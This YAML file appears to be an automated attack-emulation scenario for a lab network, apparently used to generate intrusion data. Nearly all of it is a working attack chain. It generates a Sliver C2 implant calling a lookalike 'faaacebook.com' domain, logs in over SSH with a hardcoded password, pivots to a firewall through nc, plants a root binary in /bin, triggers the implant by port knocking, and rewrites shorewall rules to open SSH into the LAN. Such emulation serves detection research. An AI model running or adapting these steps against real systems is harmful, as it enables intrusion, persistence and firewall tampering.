####################
#
# Scenario 4
#
####################
vars:
  $SERVER_ADDRESS: 192.42.0.254
  $REPOSERVER_ADDRESS: 172.17.100.122
  $ATTACKER_ADDRESS: 192.42.1.174
  $FIREWALL_ADDRESS: 172.17.100.254
  $LINUXSHARE_ADRESS: 192.168.100.23

  $NEW_IPTABLES_RULE: "-A dmz-lan -d 192.168.100.23/32 -p tcp -m tcp --dport 22 -j ACCEPT"


commands:
  - type: sliver
    cmd: "generate_implant"
    c2url: "https://faaacebook.com"
    name: "super-sliver1"

  - type: sliver
    cmd: start_https_listener
    host: 0.0.0.0
    port: 443

  - type: shell
    cmd: sshpass -p 'rambo' scp -o StrictHostKeyChecking=no -o ProxyCommand="sshpass -p 'rambo' ssh -o StrictHostKeyChecking=no -p 10022 john@$SERVER_ADDRESS nc $FIREWALL_ADDRESS 22" /home/aecid/auditf.tar.gz john@$FIREWALL_ADDRESS:/tmp/auditf.tar.gz
  
  - type: ssh
    creates_session: "foothold"
    username: john
    password: rambo
    hostname: $SERVER_ADDRESS
    port: 10022
    cmd: id

  - type: ssh
    session: foothold
    cmd: "ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password john@172.17.100.254\n"
    interactive: True
  
  - type: sleep
    seconds: 2

  - type: ssh
    session: foothold
    cmd: "rambo\n"
    interactive: True

  - type: ssh
    session: foothold
    cmd: "sudo -i\n"
    interactive: True
  
  - type: sleep
    seconds: 2

  - type: ssh
    session: foothold
    cmd: "rambo\n"
    interactive: True
  
  - type: ssh
    session: foothold
    cmd: "sudo tar -xzf /tmp/auditf.tar.gz -C /bin\n"
    interactive: True

#  - type: sleep
#    seconds: 2
#
#  - type: ssh
#    session: foothold
#    cmd: "rambo\n"
#    interactive: True


  - type: ssh
    session: foothold
    cmd: "rm /tmp/auditf.tar.gz\n"
    interactive: True

  - type: ssh
    session: foothold
    cmd: "cd /bin && chown root:root auditf && sudo ./auditf\n"
    interactive: True

  - type: ssh
    session: foothold
    cmd: "rambo\n"
    interactive: True

  - type: webserv
    local_path: $LAST_SLIVER_IMPLANT
    port: 8000
    background: true

  - type: sleep
    seconds: 5

  - type: shell
    cmd: /home/aecid/knock-cli -c knock.yaml -r knock-firewall

  - type: shell
    cmd: whoami

  - type: sleep
    seconds: 5

  - type: shell
    cmd: /home/aecid/knock-cli -c knock.yaml -r execute-implant1

  - type: shell
    cmd: /home/aecid/knock-cli -c knock.yaml -r execute-implant2

#edit the shorewall rules file directly. works.
  - type: sliver-session
    cmd: execute
    exe: sudo
    args: 
      - sed 
      - -i 
      - '/# Kafka Ports/i\ACCEPT dmz lan:$LINUXSHARE tcp  22  -   -   -' 
      - /etc/shorewall/rules
    session: super-sliver1

# works, rules are reloaded
  - type: sliver-session
    cmd: execute
    exe: shorewall
    args:
      - reload
    session: super-sliver1


# debug, this has to be interactive as well!
# exit only the session on the firewall, reuse foothold to ssh into linuxshare
  - type: ssh
    session: foothold
    cmd: "exit\n"
    interactive: True

  






  
 



        